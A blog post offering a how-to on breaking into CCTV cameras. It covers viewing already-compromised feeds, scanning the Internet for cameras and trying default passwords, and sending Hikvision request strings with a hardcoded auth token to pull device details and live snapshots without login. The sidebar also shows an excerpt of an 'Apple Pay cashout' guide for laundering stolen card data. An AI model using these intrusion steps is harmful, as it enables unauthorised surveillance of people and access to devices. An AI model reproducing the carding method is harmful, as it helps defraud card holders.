How to hack CCTV camera (for educational purpose)

How to hack CCTV camera (for educational purpose)

The methods to hack CCTV camera

There are different ways to hack CCTV camera, some of them are easy, others are a little bit more technical and some others are not even hacking.
Let's take a look at the following methods

1. Use a website that shows hacked CCTV cameras

This is not really hacking, but it's the easiest method. You just visit a website that list a lot of hacked CCTV cameras and you just need to watch them.
Those website are created by hackers that get into IP CCTV cameras or DVRs (Digital Video Recorders) and let the information available for you for free.
So, in the end of the day you are not hacking anything but just watching CCTV camera that have been hacked by somebody else.
See below an example of a website that show such hacked CCTV cameras:
The website lists CCTV hacked cameras around the world and organize them by manufacturers, countries, places, cities and timezone. 
See below an example of live CCTV cameras installed on malls.


2. Hack CCTV camera using default passwords

That's also not really a hacking but it works. You just need to find the CCTV camera online and try to use the default password, a lot of devices on the Internet are still using the same original password from the factory.
The idea is to look at the IP camera manual and look for the default password, so you can use it to hack the CCTV camera (or recorder).

How to find the IP camera on the Internet

OK, before you try the default password to hack CCTV camera you need to find them on Internet and there are different ways to do that, let's check the first method that uses a network IP scanner to find online IP devices.
In this article I will teach you how to use the Angry IP Scanner to scan the Internet and look for IP cameras and recorders (DVRs and NVRs)

3. Hack CCTV camera using a simple command

How to get the IP camera information

It's also possible to hack Hikvision camera by just sending a specific command that gets the camera information or take a screen shot. The same models and firmware version described above are affected by this issue.
If you type the camera IP and port followed by the command below you will see the camera details, such as device name, model and firmware version


System/deviceInfo?
auth=YWRtaW46MTEK

So the complete command is: 
<camera IP>:<camera port> System/deviceInfo?auth=YWRtaW46MTEK
The camera returns the information just like shown in the image below:


:



DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">

<deviceName>IP CAMERA</deviceName>

<deviceID>88</deviceID>

<deviceDescription>IPCamera</deviceDescription>

<deviceLocation>hangzhou</deviceLocation>

<systemContact>Hikvision.China</systemContact>

<model>DS-2CD2420F-IW</model>

<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>

<macAddress>a4:14:37:xx:xx:xx</macAddress>

<firmwareVersion>V5.4.5</firmwareVersion>

<firmwareReleasedDate>build 170123</firmwareReleasedDate>

<bootVersion>V1.3.4</bootVersion>

<bootReleasedDate>100316</bootReleasedDate>

<hardwareVersion>0x0</hardwareVersion>

</DeviceInfo>


















How to take a camera screenshot

Just by issuing a similar command it's possible to take the IP camera screenshot and see what is behind the CCTV camera. It's a security flaw.
See below the command to get the IP camera screenshot.

onvif-http/snapshot?auth=YWRtaW46MTEK

So the complete command is: 
<camera IP>:<camera port> onvif-http/snapshot?auth=YWRtaW46MTEK
After issue this command to the Hikvision IP camera the image below is displayed in the Web Browser without the need for authentication.

Instagram handler:@ayush_tony_8




















Comments

Post a Comment

Popular posts from this blog

5 Free Ebook Download Sites of 2020

Image
Free ebooks for download  are hard to find unless you know the right websites. This article lists the seven best sites that offer completely free ebooks 1.  Overdrive Overdrive is the cleanest, fastest, and most legal way to access millions of ebooks—not just ones in the public domain, but even recently released mainstream titles. There is one hitch though: you’ll need a valid and active public library card. Overdrive works with over 30,000 public libraries in over 40 different countries worldwide. In addition to free ebook checkouts, you’ll also be able to listen to audiobooks for free. 2. Library Genesis If you used to use BookZZ for free ebooks and have felt lost ever since BookZZ shut down, then Library Genesis (also called LibGen) is the site for you. Library Genesis is a search engine for free reading material, including ebooks, articles, magazines, and more. As of this writing, Library Genesis indexes close to 3 million ebooks and 60 million art...
Read more

APPLE PAY CASHOUT METHOD

🔰APPLE PAY CASHOUT METHOD🔰 1. Get a new or an old Iphone or Ipad that has never been used with apple pay cash. 2. Verify 1 of the accounts via apple pay cash. It has to match the name and address on a driver license and the phone. 3. Once verified make another new accont on the same iphone/ipad if it let. If not get a new phone or ipad. U can verify if u want if not u dont have 2. 4. Get a cc or debit log with email access and add it to apple pay. Once u have that verified via bank or email access u can now send cash from the debit or cc. 5. 2 ways of adding money 1st way is to go to apple pay cash on the account the cc or debit is on and click add money and its gone ask how much. If verified add $1500 if not verified add $450. Once money is added u can go to imessage and send to your other account via your money in apple pay cash. 6. The 2nd way is to send str8 to that person via imessage instead of adding it to that account. 7. U can make 3 profiles per phone or ipad...
Read more